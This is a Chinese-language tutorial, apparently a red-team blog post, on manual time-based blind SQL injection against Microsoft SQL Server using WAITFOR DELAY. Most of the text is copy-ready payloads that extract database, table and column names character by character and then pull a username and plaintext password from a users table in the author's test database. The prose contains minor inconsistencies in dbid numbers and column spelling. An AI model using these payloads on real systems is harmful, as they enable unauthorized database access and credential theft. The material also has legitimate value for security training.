延迟注入简介

延时函数 WAITFOR DELAY

WAITFOR是SQL Server中Transact-SQL提供的⼀个流程控制语句。它的作⽤就是等待特定时间，然后继续执⾏后 续的语句。它包含⼀个参数DELAY，⽤来指定等待的时间。

如果将该语句成功注⼊后，会造成数据库返回记录和 Web请求也会响应延迟特定的时间。由于该语句不涉及条件判断等情况，所以容易注⼊成功。根据Web请求是否有延迟，渗透测试⼈员就可以判断⽹站是否存在注⼊漏洞。同时，由于该语句并不返回特定内容，所以它也是盲注的重要检测⽅法。

语法：

WAITFOR DELAY '0:0:n'

⽰例：

WAITFOR DELAY '0:0:4' --  表⽰延迟4秒

IF exists ()⼦句

语法:

IF exists () WAITFOR DELAY '0:0:5'

手工延时注入

1.判断是否存在注⼊

WAITFOR DELAY '0:0:4'

2.猜测数据库名

猜测数据库名是否存在

if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--

这条语句的意思呢是判断dibd=6的数据库是否存在！如果存在那么就延迟3秒返回！

根据dbid猜库名，先猜出长度

if ((select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1) waitfor delay '0:0:3'--

因为我数据库里只有两个我创建的数据库：test（dbid5）、saulgoodman（dbid6）

所以我就能用上面的语句来判断dbid5的长度是否为5，如果为5那么就延迟3秒返回！

同理猜解dbid6（saulgoodman）的长度可以用这条语句:

if ((select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1) waitfor delay '0:0:3'--

如果有多数据库那么就同理上面的语句以此类推就好了~

根据dbid查询挨个查询数据库名

因为我们dbid=4这个数据库是test，那么我们就可以来一个一个的猜解他的数据库名：

猜解第一个字符：t
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116) WAITFOR DELAY '0:0:3'--
猜解第二个字符：e
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101) WAITFOR DELAY '0:0:3'--
猜解第三个字符：s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115) WAITFOR DELAY '0:0:3'--
猜解第四个字符：t

如果想查询dbid6的数据库saulgoodman那么我们就直接改dbid号就好了：

猜解第一个字符：s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),1,1)) = 115) WAITFOR DELAY '0:0:3'--
猜解第二个字符：a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),2,1)) = 97) WAITFOR DELAY '0:0:3'--
猜解第三个字符：u
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),3,1)) = 117) WAITFOR DELAY '0:0:3'--
猜解第四个字符：l
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),4,1)) = 108) WAITFOR DELAY '0:0:3'--
猜解第五个字符：g
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),5,1)) = 103) WAITFOR DELAY '0:0:3'--
猜解第六个字符：o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),6,1)) = 111) WAITFOR DELAY '0:0:3'--
猜解第七个字符：o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),7,1)) = 111) WAITFOR DELAY '0:0:3'--
猜解第八个字符：d
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),8,1)) = 100) WAITFOR DELAY '0:0:3'--
猜解第九个字符：m
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),9,1)) = 109) WAITFOR DELAY '0:0:3'--
猜解第十个字符：a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),10,1)) = 97) WAITFOR DELAY '0:0:3'--
猜解第十一个字符：n
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),11,1)) = 110) WAITFOR DELAY '0:0:3'--

3.猜解表名

因为我们知道了数据库名是test，然后我们就可以使用下面的语句来查询第一个表名的长度是否等于5(表名是users)：

if ( (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1) WAITFOR DELAY '0:0:3'--

由上图可见，页面返回正常说明它的表名长度是5，那么我们就可以挨个猜解他的字符：users

猜解第一个字符：u
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1) WAITFOR DELAY '0:0:3'--
猜解第二个字符：s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1) WAITFOR DELAY '0:0:3'--
猜解第三个字符：e
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1) WAITFOR DELAY '0:0:3'--
猜解第四个字符：r
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1) WAITFOR DELAY '0:0:3'--
猜解第五个字符：s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1) WAITFOR DELAY '0:0:3'--

因为我们知道了数据库名是test，第一个表名是users，然后我们就可以使用下面的语句来查询第二个表名的字符(表名是info)：

猜解第一个字符：i
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1) WAITFOR DELAY '0:0:3'--
猜解第二个字符：n
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1) WAITFOR DELAY '0:0:3'--
猜解第三个字符：f
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1) WAITFOR DELAY '0:0:3'--
猜解第四个字符：o
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1) WAITFOR DELAY '0:0:3'--

4.猜解列名

因为我们知道了表名是users，那么我们可以猜解users表名下的列名：（列名是 username）

猜解第一个字符：u
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)) WAITFOR DELAY '0:0:3'--
猜解第二个字符：s
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)) WAITFOR DELAY '0:0:3'--
猜解第三个字符：e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)) WAITFOR DELAY '0:0:3'--
猜解第四个字符：r
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)) WAITFOR DELAY '0:0:3'--
猜解第五个字符：n
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)) WAITFOR DELAY '0:0:3'--
猜解第六个字符：a
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)) WAITFOR DELAY '0:0:3'--
猜解第七个字符：m
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)) WAITFOR DELAY '0:0:3'--
猜解第八个字符：e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)) WAITFOR DELAY '0:0:3'--

这样就猜解出来了第一个列名，username！

第二种方式：我们有id、username、password、age四个列

获取第一列：（列名是id）

获取第一个字符：i
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105) WAITFOR DELAY '0:0:3'--
获取第二个字符：d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100) WAITFOR DELAY '0:0:3'--

获取第二列：（列名是username）

获取第一个字符：u
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117) WAITFOR DELAY '0:0:3'--
获取第二个字符：s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115) WAITFOR DELAY '0:0:3'--
获取第三个字符：e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101) WAITFOR DELAY '0:0:3'--
获取第四个字符：r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114) WAITFOR DELAY '0:0:3'--
获取第五个字符：n
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110) WAITFOR DELAY '0:0:3'--
获取第六个字符：a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97) WAITFOR DELAY '0:0:3'--
获取第七个字符：m
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109) WAITFOR DELAY '0:0:3'--
获取第八个字符：e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101) WAITFOR DELAY '0:0:3'--

获取第三列：（列名是password）

获取第一个字符：p
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112) WAITFOR DELAY '0:0:3'--
获取第二个字符：a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97) WAITFOR DELAY '0:0:3'--
获取第三个字符：s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115) WAITFOR DELAY '0:0:3'--
获取第四个字符：s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115) WAITFOR DELAY '0:0:3'--
获取第五个字符：w
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119) WAITFOR DELAY '0:0:3'--
获取第六个字符：o
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111) WAITFOR DELAY '0:0:3'--
获取第七个字符：r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114) WAITFOR DELAY '0:0:3'--
获取第八个字符：d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100) WAITFOR DELAY '0:0:3'--

5.逐字猜解数据

我们知道了表名是：users，列名是：username、passwrd，那么我们就开始爆数据了：（saul）

判断username列第一个字符：s
if (ascii(substring((select top 1 username from users),1,1)) = 115) WAITFOR DELAY '0:0:3'--
判断username列第二个字符：a
if (ascii(substring((select top 1 username from users),2,1)) = 97) WAITFOR DELAY '0:0:3'--
判断username列第三个字符：u
if (ascii(substring((select top 1 username from users),3,1)) = 117) WAITFOR DELAY '0:0:3'--
判断username列第四个字符：l
if (ascii(substring((select top 1 username from users),4,1)) =108) WAITFOR DELAY '0:0:3'--

这样就获取到了第一个用户名为：saul

获取saul的密码：（密码是saul520）

判断 password 列第一个字符：s
if (ascii(substring((select top 1 password from users),1,1)) =115) WAITFOR DELAY '0:0:3'--
判断 password 列第二个字符：a
if (ascii(substring((select top 1 password from users),2,1)) =97) WAITFOR DELAY '0:0:3'--
判断 password 列第三个字符：u
if (ascii(substring((select top 1 password from users),3,1)) =117) WAITFOR DELAY '0:0:3'--
判断 password 列第四个字符：l
if (ascii(substring((select top 1 password from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
判断 password 列第五个字符：5
if (ascii(substring((select top 1 password from users),5,1)) =53) WAITFOR DELAY '0:0:3'--
判断 password 列第六个字符：2
if (ascii(substring((select top 1 password from users),6,1)) =50) WAITFOR DELAY '0:0:3'--
判断 password 列第七个字符：0
if (ascii(substring((select top 1 password from users),7,1)) =48) WAITFOR DELAY '0:0:3'--

自此天书Mssql手工注入之布尔时间盲注就到这里~

公众号

若有好的建议和合作可以通过公众号与我联系！
微信公众号：渗透攻击红队